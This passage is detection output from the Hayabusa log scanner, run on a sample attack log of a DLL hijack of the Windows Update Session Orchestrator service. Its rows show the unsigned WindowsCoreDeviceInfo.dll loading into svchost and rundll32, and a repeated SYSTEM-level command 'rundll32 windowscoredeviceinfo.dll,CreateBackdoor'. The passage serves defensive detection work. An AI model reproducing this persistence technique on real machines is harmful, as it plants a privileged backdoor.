| Signed: false | Signature: Unavailable | PID: 8076 | PGUID: 747F3D96-9F61-5E75-0000-001059841E00 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:19.873 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:19.877 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1090_none_5715d73398f9ea47\TiWorker.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6420 | PGUID: 747F3D96-9F63-5E75-0000-0010BCD01F00 | Hash: 
SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.187 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.189 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.192 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.195 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7420 | PGUID: 747F3D96-9F68-5E75-0000-0010B9662000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.205 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3300 | PGUID: 747F3D96-9F68-5E75-0000-001079652000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.209 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7420 | PGUID: 00000000-0000-0000-0000-000000000000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.213 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.215 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.218 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.221 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.224 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.230 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.232 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.234 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.242 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.247 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.250 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.255 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.388 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.392 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.401 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.421 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.425 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.434 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.440 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.443 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.451 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.459 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.463 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.485 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.486 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.499 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.513 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.542 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.548 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT 